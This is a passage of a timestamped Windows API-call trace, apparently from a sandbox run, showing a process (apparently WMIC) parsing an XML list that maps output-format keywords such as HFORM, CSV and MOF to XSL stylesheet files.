This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.966] free (_Block=0x869970) [0277.966] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0277.966] malloc (_Size=0xc) returned 0x869910 [0277.966] malloc (_Size=0xc) returned 0x869940 [0277.966] SysStringLen (param_1="HFORM") returned 0x5 [0277.966] SysStringLen (param_1="TABLE") returned 0x5 [0277.966] SysStringLen (param_1="HFORM") returned 0x5 [0277.966] SysStringLen (param_1="LIST") returned 0x4 [0277.966] SysStringLen (param_1="HFORM") returned 0x5 [0277.966] SysStringLen (param_1="HTABLE") returned 0x6 [0277.966] malloc (_Size=0x18) returned 0x862c00 [0277.967] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.967] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.967] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.967] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=6, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.967] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="xml.xsl") returned 0x0 [0277.967] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.967] malloc (_Size=0xc) returned 0x8697f0 [0277.967] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.968] free (_Block=0x8697f0) [0277.968] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0277.968] malloc (_Size=0xc) returned 0x869988 [0277.968] malloc (_Size=0xc) returned 0x8697f0 [0277.968] SysStringLen (param_1="XML") returned 0x3 [0277.968] SysStringLen (param_1="TABLE") returned 0x5 [0277.968] SysStringLen (param_1="XML") returned 0x3 [0277.968] SysStringLen (param_1="VALUE") returned 0x5 [0277.968] SysStringLen (param_1="VALUE") returned 0x5 [0277.968] SysStringLen (param_1="XML") returned 0x3 [0277.968] malloc (_Size=0x18) returned 0x862b80 [0277.968] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.969] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.969] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.969] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=7, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.969] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="mof.xsl") returned 0x0 [0277.969] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.969] malloc (_Size=0xc) returned 0x869808 [0277.969] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.969] free (_Block=0x869808) [0277.970] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0277.970] malloc (_Size=0xc) returned 0x869970 [0277.970] malloc (_Size=0xc) returned 0x869808 [0277.973] SysStringLen (param_1="MOF") returned 0x3 [0277.973] SysStringLen (param_1="TABLE") returned 0x5 [0277.973] SysStringLen (param_1="MOF") returned 0x3 [0277.973] SysStringLen (param_1="LIST") returned 0x4 [0277.973] SysStringLen (param_1="MOF") returned 0x3 [0277.973] SysStringLen (param_1="RAWXML") returned 0x6 [0277.973] SysStringLen (param_1="LIST") returned 0x4 [0277.973] SysStringLen (param_1="MOF") returned 0x3 [0277.973] malloc (_Size=0x18) returned 0x862cc0 [0277.973] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.973] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.973] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.974] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=8, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.974] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="csv.xsl") returned 0x0 [0277.974] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.974] malloc (_Size=0xc) returned 0x869820 [0277.974] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.975] free (_Block=0x869820) [0277.975] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0277.975] malloc (_Size=0xc) returned 0x869820 [0277.975] malloc (_Size=0xc) returned 0x869838 [0277.975] SysStringLen (param_1="CSV") returned 0x3 [0277.975] SysStringLen (param_1="TABLE") returned 0x5 [0277.975] SysStringLen (param_1="CSV") returned 0x3 [0277.975] SysStringLen (param_1="LIST") returned 0x4 [0277.975] SysStringLen (param_1="CSV") returned 0x3 [0277.975] SysStringLen (param_1="HTABLE") returned 0x6 [0277.975] SysStringLen (param_1="CSV") returned 0x3 [0277.975] SysStringLen (param_1="HFORM") returned 0x5 [0277.975] malloc (_Size=0x18) returned 0x862c60 [0277.976] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.976] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.976] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.976] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=9, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.976] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.976] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.976] malloc (_Size=0xc) returned 0x869868 [0277.976] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.977] free (_Block=0x869868) [0277.977] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0277.977] malloc (_Size=0xc) returned 0x869868 [0277.977] malloc (_Size=0xc) returned 0x86aed0 [0277.977] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.977] SysStringLen (param_1="TABLE") returned 0x5 [0277.977] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.977] SysStringLen (param_1="VALUE") returned 0x5 [0277.977] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.977] SysStringLen (param_1="XML") returned 0x3 [0277.977] SysStringLen (param_1="XML") returned 0x3 [0277.977] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.977] malloc (_Size=0x18) returned 0x8629e0 [0277.978] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.978] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.978] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.978] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=10, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.978] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.978] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.978] malloc (_Size=0xc) returned 0x86ae10 [0277.978] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.979] free (_Block=0x86ae10) [0277.979] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0277.979] malloc (_Size=0xc) returned 0x86ae10 [0277.979] malloc (_Size=0xc) returned 0x86ae28 [0277.979] SysStringLen (param_1="texttablewsys") returned 0xd [0277.979] SysStringLen (param_1="TABLE") returned 0x5 [0277.979] SysStringLen (param_1="texttablewsys") returned 0xd [0277.979] SysStringLen (param_1="XML") returned 0x3 [0277.979] SysStringLen (param_1="texttablewsys") returned 0xd [0277.979] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.979] SysStringLen (param_1="XML") returned 0x3 [0277.979] SysStringLen (param_1="texttablewsys") returned 0xd [0277.979] malloc (_Size=0x18) returned 0x862a20 [0277.980] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.980] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.980] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.980] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=11, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.980] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.980] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.980] malloc (_Size=0xc) returned 0x86ae40 [0277.980] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.981] free (_Block=0x86ae40) [0277.981] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0277.981] malloc (_Size=0xc) returned 0x86ae58 [0277.981] malloc (_Size=0xc) returned 0x86aeb8 [0277.981] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.981] SysStringLen (param_1="TABLE") returned 0x5 [0277.981] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.981] SysStringLen (param_1="XML") returned 0x3 [0277.981] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.981] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.981] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.981] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.981] malloc (_Size=0x18) returned 0x862ac0 [0277.982] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.982] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.982] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.982] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=12, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.982] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.982] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.982] malloc (_Size=0xc) returned 0x86ae40 [0277.982] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.983] free (_Block=0x86ae40) [0277.983] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0277.983] malloc (_Size=0xc) returned 0x86aea0 [0277.983] malloc (_Size=0xc) returned 0x86ae70 [0277.983] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.983] SysStringLen (param_1="TABLE") returned 0x5 [0277.983] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.983] SysStringLen (param_1="XML") returned 0x3 [0277.983] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.983] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.983] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.983] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.983] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.984] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.984] malloc (_Size=0x18) returned 0x862b60 [0277.984] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.984] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.984] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.984] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=13, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.984] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.984] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.984] malloc (_Size=0xc) returned 0x86ae40 [0277.985] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.985] free (_Block=0x86ae40) [0277.985] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0277.985] malloc (_Size=0xc) returned 0x86ae40 [0277.985] malloc (_Size=0xc) returned 0x86ae88 [0277.985] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.985] SysStringLen (param_1="TABLE") returned 0x5 [0277.985] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.985] SysStringLen (param_1="XML") returned 0x3 [0277.985] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.985] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.986] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.986] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.986] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.986] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.986] malloc (_Size=0x18) returned 0x862ae0 [0277.986] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.986] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.986] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.986] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=14, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.987] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="texttable.xsl") returned 0x0 [0277.987] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.987] malloc (_Size=0xc) returned 0x86ab10 [0277.987] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.987] free (_Block=0x86ab10) [0277.987] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0277.987] malloc (_Size=0xc) returned 0x86ab70 [0277.988] malloc (_Size=0xc) returned 0x86ad98 [0277.988] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0277.988] SysStringLen (param_1="TABLE") returned 0x5 [0277.988] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0277.988] SysStringLen (param_1="XML") returned 0x3 [0277.988] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0277.988] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.988] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0277.988] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.988] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0277.988] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.988] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.988] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0277.988] malloc (_Size=0x18) returned 0x862b00 [0277.989] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.989] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.989] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.989] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=15, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.989] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="htable.xsl") returned 0x0 [0277.989] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.989] malloc (_Size=0xc) returned 0x86ab28 [0277.989] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.990] free (_Block=0x86ab28) [0277.990] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0277.990] malloc (_Size=0xc) returned 0x86ac60 [0277.990] malloc (_Size=0xc) returned 0x86ac78 [0277.990] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0277.990] SysStringLen (param_1="TABLE") returned 0x5 [0277.990] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0277.990] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.990] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0277.990] SysStringLen (param_1="XML") returned 0x3 [0277.990] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0277.990] SysStringLen (param_1="texttablewsys") returned 0xd [0277.990] SysStringLen (param_1="XML") returned 0x3 [0277.991] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0277.991] malloc (_Size=0x18) returned 0x862a40 [0277.991] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.991] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.991] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.991] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=16, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.991] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="htable.xsl") returned 0x0 [0277.991] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.991] malloc (_Size=0xc) returned 0x86ab58 [0277.992] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.992] free (_Block=0x86ab58) [0277.992] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0277.992] malloc (_Size=0xc) returned 0x86acc0 [0277.992] malloc (_Size=0xc) returned 0x86abe8 [0277.992] SysStringLen (param_1="htable-sortby") returned 0xd [0277.992] SysStringLen (param_1="TABLE") returned 0x5 [0277.992] SysStringLen (param_1="htable-sortby") returned 0xd [0277.992] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.992] SysStringLen (param_1="htable-sortby") returned 0xd [0277.993] SysStringLen (param_1="XML") returned 0x3 [0277.993] SysStringLen (param_1="htable-sortby") returned 0xd [0277.993] SysStringLen (param_1="texttablewsys") returned 0xd [0277.993] SysStringLen (param_1="htable-sortby") returned 0xd [0277.993] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0277.993] SysStringLen (param_1="XML") returned 0x3 [0277.993] SysStringLen (param_1="htable-sortby") returned 0xd [0277.993] malloc (_Size=0x18) returned 0x862d40 [0277.993] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.993] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.993] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.993] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=17, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.994] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="mof.xsl") returned 0x0 [0277.994] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.994] malloc (_Size=0xc) returned 0x86ac90 [0277.994] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.994] free (_Block=0x86ac90) [0277.994] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0277.994] malloc (_Size=0xc) returned 0x86ad50 [0277.994] malloc (_Size=0xc) returned 0x86aca8 [0277.995] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0277.995] SysStringLen (param_1="TABLE") returned 0x5 [0277.995] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0277.995] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.995] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0277.995] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.995] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0277.995] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.995] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.995] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0277.995] malloc (_Size=0x18) returned 0x862d60 [0277.995] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.995] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.995] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.996] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=18, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.996] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="mof.xsl") returned 0x0 [0277.996] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.996] malloc (_Size=0xc) returned 0x86aba0 [0277.996] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.996] free (_Block=0x86aba0) [0277.997] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0277.997] malloc (_Size=0xc) returned 0x86ad38 [0277.997] malloc (_Size=0xc) returned 0x86ac00 [0277.997] SysStringLen (param_1="wmiclimofformat") returned 0xf [0277.997] SysStringLen (param_1="TABLE") returned 0x5 [0277.997] SysStringLen (param_1="wmiclimofformat") returned 0xf [0277.997] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.997] SysStringLen (param_1="wmiclimofformat") returned 0xf [0277.997] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.997] SysStringLen (param_1="wmiclimofformat") returned 0xf [0277.997] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0277.997] SysStringLen (param_1="wmiclimofformat") returned 0xf [0277.997] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0277.997] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.997] SysStringLen (param_1="wmiclimofformat") returned 0xf [0277.997] malloc (_Size=0x18) returned 0x862ba0 [0277.998] IUnknown:Release (This=0x7b6b88) returned 0x0 [0277.998] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0277.998] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0277.998] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=19, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0277.998] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="textvaluelist.xsl") returned 0x0 [0277.998] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0277.998] malloc (_Size=0xc) returned 0x86ab58 [0277.998] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0277.999] free (_Block=0x86ab58) [0277.999] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0277.999] malloc (_Size=0xc) returned 0x86acd8 [0277.999] malloc (_Size=0xc) returned 0x86adb0 [0277.999] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0277.999] SysStringLen (param_1="TABLE") returned 0x5 [0277.999] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0277.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0277.999] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0277.999] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0277.999] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0277.999] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0277.999] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0278.000] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0278.000] malloc (_Size=0x18) returned 0x862c40 [0278.000] IUnknown:Release (This=0x7b6b88) returned 0x0 [0278.000] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0278.000] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0278.000] IXMLDOMNodeList:get_item (in: This=0x7b9ca0, index=20, listItem=0x35fd94 | out: listItem=0x35fd94*=0x7b6b88) returned 0x0 [0278.000] IXMLDOMNode:get_text (in: This=0x7b6b88, text=0x35fd98 | out: text=0x35fd98*="textvaluelist.xsl") returned 0x0 [0278.000] IXMLDOMNode:get_attributes (in: This=0x7b6b88, attributeMap=0x35fd90 | out: attributeMap=0x35fd90*=0x7b9fa8) returned 0x0 [0278.000] malloc (_Size=0xc) returned 0x86ac90 [0278.001] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x7b9fa8, name="KEYWORD", namedItem=0x35fd8c | out: namedItem=0x35fd8c*=0x7b9ff8) returned 0x0 [0278.001] free (_Block=0x86ac90) [0278.001] IXMLDOMNode:get_nodeValue (in: This=0x7b9ff8, value=0x35fd4c | out: value=0x35fd4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0278.002] malloc (_Size=0xc) returned 0x86acf0 [0278.002] malloc (_Size=0xc) returned 0x86ad80 [0278.002] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0278.002] SysStringLen 